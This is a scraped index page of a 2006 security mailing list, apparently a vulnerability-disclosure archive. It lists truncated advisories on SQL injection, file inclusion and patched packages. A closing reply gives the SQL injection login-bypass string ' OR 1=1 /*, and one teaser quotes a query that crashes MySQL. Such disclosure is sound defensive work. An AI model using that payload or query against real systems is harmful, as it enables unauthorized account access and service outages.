|
|
Colapse all |
Post message
Advisory: Unauthorized password recovery in phpBannerExchange 2006-06-15 RedTeam Pentesting (release redteam-pentesting de) Advisory: Unauthorized password recovery in phpBannerExchange RedTeam identified an SQL injection that can be triggered due to a bad user input sanitization in phpBannerExchange. It is possible to recover a password of an user and thereby overtake his account. Details ======= Product: phpBannerE [ more ] [ reply ] Advisory: Authentication bypass in phpBannerExchange 2006-06-15 RedTeam Pentesting (release redteam-pentesting de) Advisory: Authentication bypass in phpBannerExchange RedTeam identified two SQL injections in phpBannerExchange. It is possible to bypass user authentication with them. Details ======= Product: phpBannerExchange Affected Versions: All versions up to phpBannerExchange 2.0 RC5 Fixed Versions: 2.0 [ more ] [ reply ] [SECURITY] [DSA 1100-1] New wv2 packages fix integer overflow 2006-06-15 joey infodrom org (Martin Schulze) [ MDKSA-2006:104 ] - Updated sendmail packages fix remotely exploitable vulnerability 2006-06-15 security mandriva com Re: Amr Talkbox talkbox.PHP - Remote File Include Vulnerabilities 2006-06-15 Steven M. Christey (coley mitre org) SpC-x said: > # Amr Talkbox talkbox.PHP - Remote File Include Vulnerabilities > > ... > # if ($lang == "eng") { > # include ("$direct/lang_eng.txt"); > # } elseif ($lang =="ita") { > # include ("$direct/lang_ita.txt"); However, looking at the source code as available on http://scripts.ringsworl [ more ] [ reply ] [USN-300-1] wv2 vulnerability 2006-06-14 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-300-1 June 14, 2006 wv2 vulnerability CVE-2006-2197 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubunt [ more ] [ reply ] Secunia Research: DeluxeBB SQL Injection and File InclusionVulnerabilities 2006-06-14 Secunia Research (vuln-remove secunia com) FreeBSD Security Advisory FreeBSD-SA-06:17.sendmail 2006-06-14 FreeBSD Security Advisories (security-advisories freebsd org) Secunia Research: CMS Mundo SQL Injection and File UploadVulnerabilities 2006-06-14 Secunia Research (vuln-remove secunia com) [USN-301-1] kdm vulnerability 2006-06-14 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-301-1 June 14, 2006 kdebase vulnerability CVE-2006-2449 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 U [ more ] [ reply ] [ MDKSA-2006:103 ] - Updated spamassassin packages fix vulnerability 2006-06-14 security mandriva com [SECURITY] [DSA 1099-1] New horde2 packages fix cross-site scripting 2006-06-14 Moritz Muehlenhoff (jmm debian org) [ MDKSA-2006:102 ] - Updated libtiff packages fixes tiff2pdf vulnerability 2006-06-14 security mandriva com [SECURITY] [DSA 1098-1] New horde3 packages fix cross-site scripting 2006-06-14 Moritz Muehlenhoff (jmm debian org) [ MDKSA-2006:101 ] - Updated squirrelmail packages fix vulnerabilities 2006-06-14 security mandriva com MySQL DoS 2006-06-14 Kanatoko (anvil jumperz net) (1 replies) Description: A query like "select str_to_date( 1, NULL );" crashes mysqld. Unaffected versions: *>= 4.1.18 *>= 5.0.19 *>= 5.1.6 For more details: http://bugs.mysql.com/bug.php?id=15828 -- Kanatoko<anvil (at) jumperz (dot) net [email concealed]> Open Source WebAppFirewall http://guardian.jumperz.net/ [ more ] [ reply ] [KDE Security Advisory] KDM symlink attack vulnerability 2006-06-14 Dirk Mueller (mueller kde org) KDE Security Advisory: KDM symlink attack vulnerability Original Release Date: 2006-06-14 URL: http://www.kde.org/info/security/advisory-20060614-1.txt 0. References CVE-2006-2449 1. Systems affected: KDM as shipped with KDE 3.2.0 up to including 3.5.3. KDE 3.1.x and older and newer [ more ] [ reply ] PhpBlueDragon CMS 2.9.1, File inclusion vulnerability 2006-06-14 Federico Fazzi (federico autistici org) ----------------------------------------------------- Advisory id: FSA:015 Author: Federico Fazzi Date: 14/06/2006, 18:20 Sinthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability Type: high Product: http://phpbluedragon.net/ Patch: unavailable --------------------------------- [ more ] [ reply ] Fusion Polls (xtrphome) Remote File Inclusion 2006-06-14 SpC-x Bsdmail Org ###################################################### # Fusion Polls (xtrphome) Remote File Inclusion ###################################################### # Credit : SpC-x # Mail : SpC-x (at) bsdmail (dot) Org [email concealed] # Site : http://wWw.SaVSaK.CoM ###################################################### # Gre [ more ] [ reply ] [SECURITY] [DSA 1097-1] New Kernel 2.4.27 packages fix several vulnerabilities 2006-06-14 Moritz Muehlenhoff (jmm debian org) Flipper Poll (root_path) Remote File Inclusion 2006-06-14 SpC-x Bsdmail Org ###################################################### # Flipper Poll (root_path) Remote File Inclusion ###################################################### # Credit : SpC-x # Mail : SpC-x (at) bsdmail (dot) Org [email concealed] # Site : http://wWw.SaVSaK.CoM ###################################################### # Gr [ more ] [ reply ] [ GLSA 200606-15 ] Asterisk: IAX2 video frame buffer overflow 2006-06-14 Sune Kloppenborg Jeppesen (jaervosz gentoo org) SEC Consult SA-20060613-0 :: Outlook Web Access Cross Site Scripting Vulnerability 2006-06-14 SEC Consult Research (research sec-consult com) [ GLSA 200606-16 ] DokuWiki: PHP code injection 2006-06-14 Sune Kloppenborg Jeppesen (jaervosz gentoo org) |
|
Privacy Statement |
is very easy with
' OR 1=1 /*
and a SQL-inject will bypass the entire authentication process.
Typical, very simple SQL Injection.
peda
[ more ] [ reply ]